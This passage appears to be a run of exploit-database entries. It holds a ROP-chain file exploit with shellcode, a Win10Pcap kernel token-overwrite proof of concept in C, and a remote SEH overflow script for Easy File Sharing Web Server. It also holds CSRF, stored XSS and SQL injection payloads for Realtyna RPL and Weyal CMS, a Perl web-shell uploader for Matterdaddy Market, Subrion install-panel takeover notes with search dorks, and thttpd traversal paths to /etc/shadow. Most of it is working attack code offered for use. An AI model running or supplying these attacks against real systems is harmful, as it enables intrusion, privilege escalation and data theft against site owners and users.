fuz_text += pack('<I',0x004b310d )             # 0x004b310d :  # PUSHAD # RETN

fuz_text += 'VirtualProtect' + '\x00'

fuz_text +=  '\x41' *  17                      # correct ESP pointer 


########################################################
# Prepare registrs for Virtual protect call

# EDI = ROP NOP
# ESI = VirtualProtect adr 
# EBP = Ret adr
# ESP = auto
# EBX = 1 
# EDX = 0x40
# ECX = lpOldProtect (ptr to W address)

# Now in EAX VP adr 

fuz_text += pack('<I',0x00489cdd )              # 0x00489cdd,  # PUSH EAX # POP ESI # RETN 

fuz_text += pack('<I',0x004a6392 )              # 0x004a6392,  # POP EBX # RETN 

fuz_text += pack('<I',0x5DE58BD1 )              # 0x5DE58BD0,  # EBX = 5DE58BD1

fuz_text += pack('<I',0x004e7d31 )              # 0x004e7d31,  # SUB EBX,5DE58BD0 # RETN # EBX = 1

fuz_text += pack('<I',0x004fc23c )              # 0x004fc23c,  # XOR EDX,EDX # RETN  # EDX = 0

fuz_text += pack('<I',0x0040db04 )  * 64        # 0x0040db04,  # INC EDX # ADD AL,3B # RETN x 64 # EDX = 0x40

fuz_text += pack('<I',0x0048c064 )              # 0x0048c064,  # POP ECX # RETN 

fuz_text += pack('<I',0x00629eea )              # 0x00629eea,  # &Writable location 

fuz_text += pack('<I',0x00487d6a )              # 0x00487d6a,  # POP EDI # RETN 

fuz_text += pack('<I',0x004f4401 )              # 0x004f4401,  # RETN (ROP NOP)



fuz_text += pack('<I',0x004e6379 )              # 0x004e6379,  # POP EBP # RETN 

ret_adr_after = pack('<I',0x004f831c )          # ret adr  #  0x004f831c # ADD ESP,24 # RETN


fuz_text += ret_adr_after

fuz_text+= pack('<I',0x004ecfab )               # 0x004ecfab,  # PUSHAD # RETN 

fuz_text +=  '\x41' *  32                       # Correct poiter to ESP



fuz_text += pack('<I',0x004a37bd )              # 0x004a37bd : # jmp esp 

fuz_text += '\x90' * 16                         # NOP's :-)


##################################### END ROP CHAIN #########################################

#############################################################################################
#PASTE SHELLCODE HERE




# Run Calc
shellcode = ("\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7");


fuz_text += shellcode


############################################################################################# 
fuz_text += ret_NOP * 250                       # spray RETN adr

#############################################################################################

############################### ROP CHAIN FOR ENG VERSION ###################################







# Prepare to call GetModuleHandleW
# EDI = GetModuleHandleW adr
# ESI = ret adr 
# EBP = ptr to unicode 'kernel32.dll'
                  
ret_adr_after = pack('<I',0x004cad21 )          # 0x004cad21 :  # ADD ESP,30 # RETN    ( this need to correct ESP )
module_handlew_adr = pack('<I',0x004FC85C )     # 0x004FC85C GetModuleHandleW adr
kernel32_u = pack('<I',0x00560724 )              # 0x00560724  ptr to unicode 'kernel32.dll'


#0x00488ed6 :  # POP EDI # POP ESI # POP EBP # POP EBX # RETN 
fuz_text +=  pack('<I',0x00488ed6 )   + module_handlew_adr + ret_adr_after + kernel32_u

fuz_text +=  '\x41' *  4

                                                
fuz_text +=  pack('<I',0x004a8ee8 )             # 0x004a8ee8 # ADD ESP,24 # RETN

fuz_text +=  '\x41' *  36

fuz_text += pack('<I',0x004b3ded )              # 0x004b3ded :  # PUSHAD # RETN

fuz_text +=  '\x41' *  28                       # correct after ADD ESP,30


#Junk
#################################################
fuz_text +=  pack('<I',0x004a8ee8 )             # 0x004a8ee8 # ADD ESP,24 # RETN

fuz_text +=  '\x41' *  36
#################################################

#EAX = kernel32 base adr

# Prepare to call GetProcAdress
# EDI = GetProcAdress adr
# ESI = ret adr 
# EBP = kernel32 base adr
# ESP = ptr to ANSII 'VirtualProtect00'


ret_adr_after = pack('<I',0x004cad21 )          # 0x004cad21 :  # ADD ESP,30 # RETN    ( this need to correct ESP )             

get_proc_adr  = pack('<I',0x0043C8B2 )          # 0x0043C8B2 - GetProcAdress


# 0x00488ed6 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN

fuz_text += pack('<I',0x00488ed6 )  + get_proc_adr +  ret_adr_after           

fuz_text +=  '\x41' *  8


fuz_text += pack('<I',0x004b9dfe )             # 0x004b9dfe :  # XCHG EAX,EBP # SETE CL # MOV EAX,ECX # RETN

fuz_text += pack('<I',0x004b3ded )             # 0x004b3ded :  # PUSHAD # RETN

fuz_text += 'VirtualProtect' + '\x00'

fuz_text +=  '\x41' *  17                      # correct ESP pointer 


########################################################
# Prepare registers for the VirtualProtect call

# EDI = ROP NOP
# ESI = VirtualProtect adr 
# EBP = Ret adr
# ESP = auto
# EBX = 1 
# EDX = 0x40
# ECX = lpOldProtect (ptr to W address)

# Now in EAX VP adr 

fuz_text += pack('<I',0x00489c3d )              # 0x00489c3d,  # PUSH EAX # POP ESI # RETN 

fuz_text += pack('<I',0x00481c40 )              # 0x00481c40,  # POP EBX # RETN 

fuz_text += pack('<I',0x5DE58BD1 )              # 0x5DE58BD0,  # EBX = 5DE58BD1

fuz_text += pack('<I',0x004e7c91 )              # 0x004e7c91,  # SUB EBX,5DE58BD0 # RETN # EBX = 1

fuz_text += pack('<I',0x004fc19c )              # 0x004fc19c,  # XOR EDX,EDX # RETN 

fuz_text += pack('<I',0x0040db04 )  * 64        # 0x0040db04,  # INC EDX # ADD AL,3B # RETN x 64 # EDX = 0x40

fuz_text += pack('<I',0x004f39dc )              # 0x004f39dc,  # POP ECX # RETN 

fuz_text += pack('<I',0x0062909d )              # 0x0062909d,  # &Writable location 

fuz_text += pack('<I',0x00495df4 )              # 0x00495df4,  # POP EDI # RETN 

fuz_text += pack('<I',0x00483a02 )              # 0x00483a02,  # RETN (ROP NOP)



fuz_text += pack('<I',0x004fb3c6 )              # 0x004fb3c6,  # POP EBP # RETN 

ret_adr_after = pack('<I',0x004a8ee8 )          # ret adr  #  0x004a8ee8 # ADD ESP,24 # RETN


fuz_text += ret_adr_after

fuz_text+= pack('<I',0x004b3ded )               # 0x004b3ded,  # PUSHAD # RETN 

fuz_text +=  '\x41' *  32                       # Correct poiter to ESP



fuz_text += pack('<I',0x004757a7  )              # 0x004757a7  : # jmp esp 

fuz_text += '\x90' * 16                         # NOP's :-)


fuz_text += shellcode








##############################################################################################
fuz_text += '\x41' * 6000                       # final junk


################################ GENERATE utf-16 fb2 file ####################################

start = '''
<?xml version="1.0" encoding="unicode-utf_16"?>
<FictionBook xmlns="http://www.gribuser.ru/xml/fictionbook/2.0" xmlns:l="http://www.w3.org/1999/xlink">
  <description>
    <title-info>
      <author>
        <first-name> 
    '''

end   = '''
   <middle-name/>
        <last-name/>
      </author>
      <book-title>EXPLOIT TEST</book-title>
	 </title-info>
    </description>
</FictionBook>
'''
start_u = start.encode('utf-16')

end_u = end.encode('utf-16')

fout = open(file_result, 'wb')
fout.write(start_u)
fout.close()

fout = open(file_result,'ab')
fout.write(fuz_text)
fout.close()

fout = open(file_result,'ab')
fout.write(end_u)
fout.close()


print "[*] File successfully created !!\n\n"
            
// Source: https://github.com/Rootkitsmm/Win10Pcap-Exploit

#include <stdio.h>
#include <tchar.h>
#include<Windows.h>
#include<stdio.h>
#include <winternl.h>
#include <intrin.h>
#include <psapi.h>
#include <strsafe.h>
#include <assert.h>

#define	SL_IOCTL_GET_EVENT_NAME		CTL_CODE(0x8000, 1, METHOD_NEITHER, FILE_ANY_ACCESS)
#define STATUS_SUCCESS					((NTSTATUS)0x00000000L)
#define STATUS_INFO_LENGTH_MISMATCH		((NTSTATUS)0xc0000004L)

/* found with :
!token 
1: kd> dt nt!_OBJECT_HEADER
   +0x000 PointerCount     : Int4B
   +0x004 HandleCount      : Int4B
   +0x004 NextToFree       : Ptr32 Void
   +0x008 Lock             : _EX_PUSH_LOCK
   +0x00c TypeIndex        : UChar
   +0x00d TraceFlags       : UChar
   +0x00e InfoMask         : UChar
   +0x00f Flags            : UChar
   +0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : Ptr32 Void
   +0x014 SecurityDescriptor : Ptr32 Void
   +0x018 Body             : _QUAD

TypeIndex is 0x5 on the build this dump was taken from. Object type indexes
differ between Windows versions/builds, so re-derive this value (repeat the
!token / dt dump) before relying on HANDLE_TYPE_TOKEN.
*/
#define HANDLE_TYPE_TOKEN				0x5


// Undocumented SYSTEM_INFORMATION_CLASS: SystemHandleInformation
const SYSTEM_INFORMATION_CLASS SystemHandleInformation = 
(SYSTEM_INFORMATION_CLASS)16;

// The NtQuerySystemInformation function and the structures that it returns 
// are internal to the operating system and subject to change from one 
// release of Windows to another. To maintain the compatibility of your 
// application, it is better not to use the function.
typedef NTSTATUS (WINAPI * PFN_NTQUERYSYSTEMINFORMATION)(
	IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
	OUT PVOID SystemInformation,
	IN ULONG SystemInformationLength,
	OUT PULONG ReturnLength OPTIONAL
	);

// Undocumented structure: SYSTEM_HANDLE_INFORMATION
typedef struct _SYSTEM_HANDLE 
{
	ULONG ProcessId;           // owning process id; compared against the target pid
	UCHAR ObjectTypeNumber;    // object type index; compared against HANDLE_TYPE_TOKEN
	UCHAR Flags;
	USHORT Handle;             // handle value inside the owning process (not used here)
	PVOID Object;              // kernel address of the object; the PoC treats it as the _TOKEN address
	ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;

// Variable-length buffer returned for SystemHandleInformation: NumberOfHandles
// entries follow inline.
// NOTE(review): this layout matches the 32-bit (Ptr32) dump in the comment
// above; field widths and padding would need re-checking for an x64 build.
typedef struct _SYSTEM_HANDLE_INFORMATION 
{
	ULONG NumberOfHandles;
	SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;


// Undocumented FILE_INFORMATION_CLASS: FileNameInformation
const FILE_INFORMATION_CLASS FileNameInformation = 
(FILE_INFORMATION_CLASS)9;

// The NtQueryInformationFile function and the structures that it returns 
// are internal to the operating system and subject to change from one 
// release of Windows to another. To maintain the compatibility of your 
// application, it is better not to use the function.
typedef NTSTATUS (WINAPI * PFN_NTQUERYINFORMATIONFILE)(
	IN HANDLE FileHandle,
	OUT PIO_STATUS_BLOCK IoStatusBlock,
	OUT PVOID FileInformation,
	IN ULONG Length,
	IN FILE_INFORMATION_CLASS FileInformationClass
	);

// FILE_NAME_INFORMATION contains name of queried file object.
typedef struct _FILE_NAME_INFORMATION {
	ULONG FileNameLength;
	WCHAR FileName[1];
} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;


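void* FindTokenAddressHandles(ULONG pid)
{
	/////////////////////////////////////////////////////////////////////////
	// Locate the kernel address of a token object that `pid` holds a handle to.
	//
	// Walks the system-wide handle table (NtQuerySystemInformation with the
	// undocumented SystemHandleInformation class) and returns the Object
	// field of the first entry whose ProcessId matches `pid` and whose type
	// index equals HANDLE_TYPE_TOKEN.  The caller should have opened a token
	// handle in that process beforehand so at least one such entry exists.
	//
	// Returns NULL when ntdll / NtQuerySystemInformation cannot be resolved,
	// the query fails for a reason other than a short buffer, the buffer
	// cannot be allocated, or no matching handle is present.  Failures are
	// reported on stderr instead of via assert(), which is compiled out in
	// release builds and would otherwise let a NULL pointer through.
	//
	// NOTE(review): HANDLE_TYPE_TOKEN is build-specific, and the first
	// matching handle is returned without checking that it is the process's
	// primary token; both assumptions are inherited from the original PoC.
	/////////////////////////////////////////////////////////////////////////

	// ntdll.dll is mapped into every process, so GetModuleHandle is enough and
	// avoids the extra reference LoadLibrary would take (and never release).
	HMODULE hNtDll = GetModuleHandle(_T("ntdll.dll"));
	if (hNtDll == NULL)
	{
		fprintf(stderr, "GetModuleHandle(ntdll.dll) failed: %lu\n", GetLastError());
		return NULL;
	}

	PFN_NTQUERYSYSTEMINFORMATION NtQuerySystemInformation =
		(PFN_NTQUERYSYSTEMINFORMATION)GetProcAddress(hNtDll, "NtQuerySystemInformation");
	if (NtQuerySystemInformation == NULL)
	{
		fprintf(stderr, "GetProcAddress(NtQuerySystemInformation) failed: %lu\n", GetLastError());
		return NULL;
	}

	/////////////////////////////////////////////////////////////////////////
	// Get system handle information.
	//
	// NtQuerySystemInformation does not report the required size for this
	// class, so grow the buffer until the call stops returning
	// STATUS_INFO_LENGTH_MISMATCH.  Doubling keeps the retry count small on
	// systems with large handle tables (4 KiB linear steps can need hundreds
	// of round trips).
	DWORD nSize = 4096;
	DWORD nReturn = 0;
	NTSTATUS status;
	PSYSTEM_HANDLE_INFORMATION pSysHandleInfo = NULL;

	for (;;)
	{
		pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), 0, nSize);
		if (pSysHandleInfo == NULL)
		{
			fprintf(stderr, "HeapAlloc(%lu) failed\n", (unsigned long)nSize);
			return NULL;
		}

		status = NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, nSize, &nReturn);
		if (status != STATUS_INFO_LENGTH_MISMATCH)
			break;

		HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
		pSysHandleInfo = NULL;
		nSize *= 2;
	}

	// The original fell through on any other failure and then read
	// NumberOfHandles from uninitialised heap memory.
	if (status != STATUS_SUCCESS)
	{
		fprintf(stderr, "NtQuerySystemInformation failed: 0x%08lx\n", (unsigned long)status);
		HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
		return NULL;
	}

	// Copy the result out before freeing the table; the original returned from
	// inside the loop and leaked the buffer on the success path.
	void* tokenObject = NULL;
	for (ULONG i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
	{
		PSYSTEM_HANDLE pHandle = &pSysHandleInfo->Handles[i];
		if (pHandle->ProcessId != pid || pHandle->ObjectTypeNumber != HANDLE_TYPE_TOKEN)
			continue;

		printf(" ObjectTypeNumber %u , ProcessId %lu , Object  %p \r\n",
			(unsigned)pHandle->ObjectTypeNumber, (unsigned long)pHandle->ProcessId, pHandle->Object);
		tokenObject = pHandle->Object;
		break;
	}

	/////////////////////////////////////////////////////////////////////////
	// Clean up.
	//
	HeapFree(GetProcessHeap(), 0, pSysHandleInfo);

	return tokenObject;
}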

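int main(void)
{
	// Flow: (1) open our own primary token so a token handle for this PID is
	// present in the system handle table, (2) recover that token object's
	// kernel address from the handle table, (3) hand the driver an "output
	// buffer" that points into the token object.  SL_IOCTL_GET_EVENT_NAME is
	// METHOD_NEITHER, so the driver receives the raw user-supplied pointer
	// and -- presumably, this is the bug the PoC relies on -- writes the
	// event name to it without checking that it lies in user space.
	//
	// NOTE(review): the +0x34 offset into the token and the device GUID are
	// taken verbatim from the original PoC for the build it was tested on;
	// neither is verified here.
	//
	// Returns 0 on success, 1 on any failure (the original was `void main`).
	DWORD dwBytesReturned = 0;
	HANDLE token = NULL;
	HANDLE hDriver;
	void* TokenAddress;
	BOOL ioctlOk;

	// Create a token handle first so the handle-table walk can find the object.
	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token))
	{
		fprintf(stderr, " OpenProcessToken error %lu.\n", GetLastError());
		return 1;
	}

	TokenAddress = FindTokenAddressHandles(GetCurrentProcessId());
	CloseHandle(token);

	// The original added 0x34 to a possibly-NULL result and passed it on.
	if (TokenAddress == NULL)
	{
		fprintf(stderr, " Could not find a token object for this process.\n");
		return 1;
	}

	// The device name is left hard-coded, as in the original PoC (its author
	// deliberately did not add runtime discovery of the instance GUID).
	hDriver = CreateFileA("\\\\.\\WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3}",
		GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	if (hDriver == INVALID_HANDLE_VALUE)
	{
		fprintf(stderr, " Open Driver error %lu.\n", GetLastError());
		return 1;
	}
	fprintf(stderr, " Open Driver OK\n");

	// lpInBuffer is NULL with a claimed length of 0x80 and lpOutBuffer is the
	// kernel address; under METHOD_NEITHER both are forwarded to the driver as-is.
	ioctlOk = DeviceIoControl(hDriver, SL_IOCTL_GET_EVENT_NAME,
		NULL, 0x80,
		(void*)((char*)TokenAddress + 0x34), 0,
		&dwBytesReturned, NULL);
	if (!ioctlOk)
		fprintf(stderr, "send IOCTL error %lu.\n", GetLastError());
	else
		fprintf(stderr, " Send IOCTL OK\n");

	// Always release the device handle (the original leaked it on the error path).
	CloseHandle(hDriver);
	if (!ioctlOk)
		return 1;

	getchar();   // keep the process alive so the result can be inspected
	return 0;
}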
            
Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities


Vendor: Realtyna LLC
Product web page: https://www.realtyna.com
Affected version: 8.9.2

Summary: Realtyna CRM (Client Relationship Management) Add-on
for RPL is a Real Estate CRM specially designed and developed
based on business process and models required by Real Estate
Agents/Brokers. Realtyna CRM intends to increase the Conversion
Ratio of the website Visitors to Leads and then Leads to Clients.


Desc: The administrator-side com_rpl actions are executed on plain HTTP
requests without any anti-CSRF token or other check that the request was
intentionally issued by the user. This can be exploited to perform actions
with administrative privileges (for example adding a membership user, see
the PoC below) if a logged-in administrator visits a malicious web site.
Multiple stored cross-site scripting vulnerabilities were also discovered:
input passed via the new_location_en_gb and new_location_fr_fr parameters
of the location manager is not properly sanitized before being stored and
returned to the user. This can be exploited to execute arbitrary HTML and
script code in a user's browser session in the context of the affected site.

Tested on: Apache
           PHP/5.4.38
		   MySQL/5.5.42-cll

Vulnerability discovered by Bikramaditya 'PhoenixX' Guha


Advisory ID: ZSL-2015-5271
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5271.php
Vendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog
CVE ID: CVE-2015-7715
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7715


05.10.2015

--


1. CSRF:

<html lang="en">
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://localhost/administrator/index.php" id="formid" method="post">
<input type="hidden" name="option" value="com_rpl" />
<input type="hidden" name="view" value="addon_membership_members" />
<input type="hidden" name="format" value="ajax" />
<input type="hidden" name="function" value="add_user" />
<input type="hidden" name="id" value="85" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>


2. Cross Site Scripting (Stored):

http://localhost/administrator/index.php
POST parameters: new_location_en_gb, new_location_fr_fr

Payloads:

option=com_rpl&view=location_manager&format=ajax&new_location_en_gb=%22onmousemove%3D%22alert(1)%22%22&new_location_fr_fr=&level=1&parent=&function=add_location
option=com_rpl&view=location_manager&format=ajax&new_location_en_gb=&new_location_fr_fr=%22onmousemove%3D%22alert(2)%22%22&level=1&parent=&function=add_location
            
Realtyna RPL 8.9.2 Joomla Extension Multiple SQL Injection Vulnerabilities


Vendor: Realtyna LLC
Product web page: https://www.realtyna.com
Affected version: 8.9.2

Summary: Realtyna CRM (Client Relationship Management) Add-on
for RPL is a Real Estate CRM specially designed and developed
based on business process and models required by Real Estate
Agents/Brokers. Realtyna CRM intends to increase the Conversion
Ratio of the website Visitors to Leads and then Leads to Clients.


Desc: Realtyna RPL suffers from multiple SQL Injection vulnerabilities.
Input passed via multiple POST parameters is not properly sanitised before
being used in SQL queries. This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code (the payloads below use a bare single quote
to trigger a database error and confirm injection).

Tested on: Apache
           PHP/5.4.38
		   MySQL/5.5.42-cll	

Vulnerability discovered by Bikramaditya 'PhoenixX' Guha


Advisory ID: ZSL-2015-5272
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5272.php
Vendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog
CVE ID: CVE-2015-7714
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7714


05.10.2015

--


http://localhost/administrator/index.php
POST parameters: id, copy_field, pshow, css, tip, cat_id, text_search, plisting, pwizard

Payloads:

- option=com_rpl&view=addon_membership_members&format=edit&id=84'
- option=com_rpl&view=property_structure&format=ajax&function=new_field&id=3004'&type=text
- option=com_rpl&view=rpl_multilingual&format=ajax&function=data_copy&copy_field=308'&copy_from=&copy_to=en_gb&copy_method=1
- option=com_rpl&view=property_structure&format=ajax&function=update_field&id=3002&options=0&css=&tip=&style=&name=&cat_id=1&text_search=0&plisting=0&pshow=1'&pwizard=1&mode=add
            
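#!/usr/bin/env python
# Easy File Sharing Web Server v7.2 Remote SEH Based Overflow
# The buffer overwrites ebx with 750+ offset, when sending 4059 it overwrites the EBX
# vulnerable file /changeuser.ghp > Cookies UserID=[buf]
# Means there are two ways to exploit changeuser.ghp
# Tested on Win7 x64 and x86, it should work on win8/win10
# By Audit0r
# https://twitter.com/Audit0rSA
#
# Review notes:
#  - argument handling now fails with a usage message when host or port is
#    missing or non-numeric (the original checked only argv[1] and then
#    indexed argv[2]);
#  - the request is sent with sendall() so the ~4.3 KB request cannot be cut
#    short by a partial send();
#  - the misspelled "Conection" header is corrected;
#  - byte strings are used throughout so the payload is byte-exact under
#    Python 2 and 3.


import sys, socket, struct


# https://code.google.com/p/win-exec-calc-shellcode/  (spawns calc.exe)
SHELLCODE = (
    b"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
    b"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
    b"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
    b"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
    b"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
    b"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
    b"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
    b"\x1c\x39\xbd"
)

# Bytes of filler between the start of the UserID cookie value and the SEH record.
SEH_OFFSET = 4059
# POP/POP/RET gadget in ImageLoad.dll (the original's "pop commands" address).
PPR_GADGET = 0x10017743


def build_payload():
    """Return the UserID cookie value.

    Layout: filler | nSEH | SEH | NOP sled | shellcode | tail.  nSEH is a
    short JMP +6 that hops over the SEH handler address into the sled; SEH is
    the POP/POP/RET gadget that lands execution on nSEH.
    """
    payload = b"A" * SEH_OFFSET
    payload += b"\xeb\x06\x90\x90"             # nSEH: JMP SHORT +6, NOP-padded
    payload += struct.pack("<I", PPR_GADGET)   # SEH: POP POP RET -> nSEH
    payload += b"\x90" * 40                    # NOP sled
    payload += SHELLCODE
    payload += b"C" * 50                       # trailing filler
    return payload


def build_request(host, port, payload=None):
    """Assemble the raw HTTP GET for /changeuser.ghp carrying `payload` in the
    UserID cookie.  `host` is a str, `port` an int; `payload` defaults to
    build_payload().  Returns bytes ending in the blank line that terminates
    the headers.
    """
    if payload is None:
        payload = build_payload()
    host_b = host.encode("ascii")
    hostport = host_b + b":" + str(port).encode("ascii")
    lines = [
        b"GET /changeuser.ghp HTTP/1.1",
        b"User-Agent: Mozilla/4.0",
        b"Host:" + hostport,
        b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        b"Accept-Language: en-us",
        b"Accept-Encoding: gzip, deflate",
        b"Referer: http://" + host_b + b"/",
        b"Cookie: SESSIONID=6771; UserID=" + payload + b"; PassWD=;",
        b"Connection: Keep-Alive",
    ]
    return b"\r\n".join(lines) + b"\r\n\r\n"


def main(argv):
    """Parse [host] [port] from argv, fire the request once, return an exit code."""
    if len(argv) != 3:
        print("Usage: python efsws.py [host] [port]")
        return 1
    host = argv[1]
    try:
        port = int(argv[2])
    except ValueError:
        print("Usage: python efsws.py [host] [port]")
        return 1

    print("[+]Connecting to" + host)
    request = build_request(host, port)

    print("[+]Sending the Calc....")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
        s.sendall(request)   # send() may write only part of the buffer
    finally:
        s.close()
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))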
            
{-} Title => Subrion 3.X.X - Multiple Exploits

{-} Author => bRpsd (skype: vegnox)

{-} Date Release => 23 October, 2015


{-} Vendor => Subrion
    Homepage => http://www.subrion.org/
	Download => http://tools.subrion.org/get/latest.zip
	Vulnerable Versions => 3.X.X
	Tested Version => Latest, 3.3.5 on a Wamp Server.

{x} Google Dork:: 1 => "© 2015 Powered by Subrion CMS"
{x} Google Dork:: 2 => "Powered by Subrion CMS"

--------------------------------------------------------------------------------------------------------------------------------
The installation folder is never deleted or protected after setup unless you remove it yourself.
This lets any unauthenticated user reach the installation panel and take over or wreck the site in a few steps.
--------------------------------------------------------------------------------------------------------------------------------


#######################################################################################
Vulnerability #1 : Reset Administrator Password & Database settings
Risk: High
File Path: http://localhost/cms/install/install/configuration/
#######################################################################################



#######################################################################################
Vulnerability #2 : Arbitrary File Download + Full Path Disclosure 
Risk: Medium
File Path: http://localhost/cms/install/install/download/
Method: POST
Parameter (for file contents) : config_content
#######################################################################################


#######################################################################################
Vulnerability #3 : Unauthorized Arbitrary Plugins Installer 
Risk: Medium
File Path: http://localhost/cms/install/install/plugins/
#######################################################################################


** SOLUTION ** ! :
Remove the entire /install/ directory once installation is complete (this closes all three issues);
at the very least, delete the file located at:
/install/modules/module.install.php


H@PPY H@CK1NG !
            
source: https://www.securityfocus.com/bid/60150/info

Matterdaddy Market is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to execute arbitrary script code, upload arbitrary files, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Matterdaddy Market 1.4.2 is vulnerable; other versions may also be affected.

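#!/usr/bin/perl
# Matterdaddy Market 1.4.2 - file upload PoC for controller.php?op=newItem.
# Prompts for the target base URL and a local file, then posts a new item
# whose "filetoupload" part carries that file's contents.

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;

# Build the multipart/form-data POST for the new-item endpoint.
#   $url  - base URL of the target without trailing slash, e.g. http://target.com
#   $file - path of a local file to upload
# Returns an HTTP::Request.
# The file is passed as an array ref: HTTP::Request::Common then reads the
# file and uses its basename as the part's filename.  The original passed the
# bare path string, which sends the path text as the field value and never
# uploads any file data at all.
sub build_request {
    my ($url, $file) = @_;
    return POST $url . '/controller.php?op=newItem',
        Content_Type => 'multipart/form-data',
        Content      => [
            'md_title'       => '1337day',
            'md_description' => 'Inj3ct0r Exploit Database',
            'md_price'       => '0',
            'md_email2'      => 'kedans@pene-test.dz', # put your email here
            'city'           => 'Hassi Messaoud',
            'namer'          => 'KedAns-Dz',
            'category'       => '4',
            'filetoupload'   => [ $file ],
            'filename'       => 'k3dsh3ll.php;.jpg',
            # to turn this into an SQLi probe, change the file name to:
            # k3dsh3ll' [+ SQLi +].php.jpg  (an intercepting proxy is easier)
        ];
}

# Interactive driver: prompt, send, report.  Returns the process exit code.
sub main {
    local $| = 1;   # flush the prompts before blocking on STDIN
    print <<INTRO;
|====================================================|
|=   Matterdaddy Market 1.4.2 File Uploader Fuzzer   |
|=         >> Provided By KedAns-Dz <<               |
|=          e-mail : ked-h[at]hotmail.com            |
|====================================================|
INTRO
    print "\n";
    print "[!] Enter URL(f.e: http://target.com): ";
    my $url = <STDIN>;
    unless (defined $url) { print "\n[-] No URL given, aborting.\n"; return 1; }
    chomp $url;
    print "\n";
    print "[!] Enter File Path (f.e: C:\\Shell.php;.gif): "; # local file to upload
    my $file = <STDIN>;
    unless (defined $file) { print "\n[-] No file given, aborting.\n"; return 1; }
    chomp $file;
    # HTTP::Request::Common croaks with an unhelpful message on an unreadable file
    unless (-r $file) { print "[-] Cannot read file '$file'!\n"; return 1; }

    my $ua = LWP::UserAgent->new;
    my $re = $ua->request(build_request($url, $file));
    print "\n";
    if ($re->is_success) {
        # original heuristic: the page mentions "Disabled" when the item was accepted
        if (index($re->content, "Disabled") != -1) { print "[+] Exploit Successfull! File Uploaded!\n"; }
        else { print "[!] Check your email and confirm u'r post! \n"; }
    } else { print "[-] HTTP request Failed!\n"; }
    return 0;
}

exit main() unless caller;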
            
source: https://www.securityfocus.com/bid/60089/info

Weyal CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/fullstory.php?id=-999 union all select 1,2,version(),user(),database(),6

http://www.example.com/fullstory.php?id=-999 UNION SELECT 1,2,version(),database(),5,6,7,8,9,10,11,12,13,14

http://www.example.com/countrys.php?countryid=-999 union all select 1,version(),database() 
            
source: https://www.securityfocus.com/bid/60010/info

thttpd is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue will allow an attacker to view arbitrary local files that are readable by the web server's user, within the context of the web server; the /etc/shadow example below is only exposed if thttpd runs as root. Information harvested may aid in launching further attacks. 

www.example.com/../../../../../../../../etc/passwd

www.example.com/../../../../../../../../etc/shadow 
            
/*
source: https://www.securityfocus.com/bid/60004/info

The RRDtool module for Python is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input.

